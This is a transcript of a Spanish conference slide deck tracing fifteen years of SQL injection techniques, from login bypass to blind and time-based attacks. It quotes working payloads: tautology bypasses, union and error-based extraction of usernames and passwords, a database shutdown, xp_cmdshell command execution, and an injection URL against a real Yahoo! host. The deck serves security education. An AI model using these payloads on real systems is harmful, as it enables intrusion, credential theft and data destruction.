Codemotion 2013: Feliz 15 aniversario, SQL Injection
-
Upload
chema-alonso -
Category
Technology
-
view
1.340 -
download
3
description
Transcript of Codemotion 2013: Feliz 15 aniversario, SQL Injection
![Page 1: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/1.jpg)
Feliz 15 aniversario, SQL Injection
![Page 2: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/2.jpg)
Los Amantes del Círculo Polar
![Page 3: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/3.jpg)
25 – Dec – 1998: El nacimiento
http://www.phrack.org/issues.html?id=8&issue=54
![Page 4: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/4.jpg)
‘or ‘1’=‘1
q=“Select uid from users where uid=‘“+$user+”’ and pass=“’+pass+’”;”
admin
‘ or ‘1’=‘1
q=“Select uid from users where uid=‘admin’ and pass=‘’ or ‘1’=‘1’;”
![Page 5: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/5.jpg)
![Page 6: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/6.jpg)
14 – Aug – 2007: IBM
http://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerability
![Page 7: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/7.jpg)
Inband
-1‘ union select 1,1,1,1,username,1,’a’,1 from users --
![Page 8: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/8.jpg)
![Page 9: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/9.jpg)
2001 - OutBand
http://www.blackhat.com/presentations/bh-asia-01/litchfield/litchfield.doc
![Page 10: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/10.jpg)
Yesterday - [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'or'.
q=“Select title from noticias where ud=“+$id+”;”
Id=1 or 1=(select top 1 username from sysusers)
![Page 11: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/11.jpg)
Jul – 2007: Microsoft Partner Programme
![Page 12: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/12.jpg)
2002 – Advanced SQL Injection Techniques
https://sparrow.ece.cmu.edu/group/731-s11/readings/anley-sql-inj.pdf
![Page 13: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/13.jpg)
Advanced Tricks
Id= 1; shutdown --
Username: '; begin declare @ret varchar(8000) set @ret=':' select
@ret=@ret+' '+username+'/'+password from users where username>@ret
select @ret as ret into foo end--
Username: ' union select ret,1,1,1 from foo--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07’
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the varchar value ': admin/r00tr0x! guest/guest chris/password
fred/sesame' to a column of data type int.
exec master..xp_cmdshell 'dir'
![Page 14: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/14.jpg)
27 – Mar - 2007
![Page 15: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/15.jpg)
Outter Bands
DNS Queries
FTP Sites
SMB Files
Remote DB
Web Files
Log Files
![Page 16: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/16.jpg)
2002 - Blind
http://server/miphp.php?id=1 and 1=1
http://server/miphp.php?id=1 and 1=0
True
False
![Page 17: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/17.jpg)
2010 – US Army
![Page 18: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/18.jpg)
2010 – US Army
![Page 19: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/19.jpg)
2002 – Time Based Blind SQL Injection
http://www.northernfortress.net/more_advanced_sql_injection.pdf
![Page 20: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/20.jpg)
(more) Advanced Tricks
if (ascii(substring(@s, @byte, 1)) & ( power(2, @bit))) > 0 waitfor delay '0:0:5'
ping -n 10 127.0.0.1
![Page 21: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/21.jpg)
![Page 22: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/22.jpg)
2004 – Time-Based in Other Databases
SQL Server1) ; if … wait for delay2) ; exec xp_cmdshell (ping –n)
Oracle1) dms_lock.sleep()
PL/SLQ Injection
MySQL1) and sleep()
5.0 or higher2) Benchmarck functions
Postgres:1) pg:sleep()
![Page 23: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/23.jpg)
Jun – 2007 : Solar Empire Exploit
http://www.elladodelmal.com/2007/06/blind-sql-injection-ii-de-hackeando-un.html
![Page 24: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/24.jpg)
Apr – 2013: Yahoo!
http://tw.ysm.emarketing.yahoo.com/soeasy/index.php?p=2&scId=113; select SLEEP(5)--
http://www.elladodelmal.com/2013/04/time-based-blind-sql-injection-en-yahoo.html
![Page 25: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/25.jpg)
2007 – Time-Based SQL Injection using Heavy Queries
https://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdf
![Page 26: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/26.jpg)
Time-Based Using Heavy Queries in MS Access
True
False
![Page 27: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/27.jpg)
Deep Blind SQL Injection
http://labs.portcullis.co.uk/application/deep-blind-sql-injection
![Page 28: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/28.jpg)
Serialized SQL Injection
![Page 29: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/29.jpg)
Airthmetic Blind SQL Injection
![Page 30: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/30.jpg)
RFD
![Page 31: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/31.jpg)
Connection String Parameter Pollution
![Page 32: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/32.jpg)
Xpath Injection
![Page 33: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/33.jpg)
LDAP Injection
![Page 34: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/34.jpg)
OWASP TOP 10 - 2013
![Page 35: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/35.jpg)
Forbiden
![Page 36: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/36.jpg)
Fixing Code Injections isn´t the worst job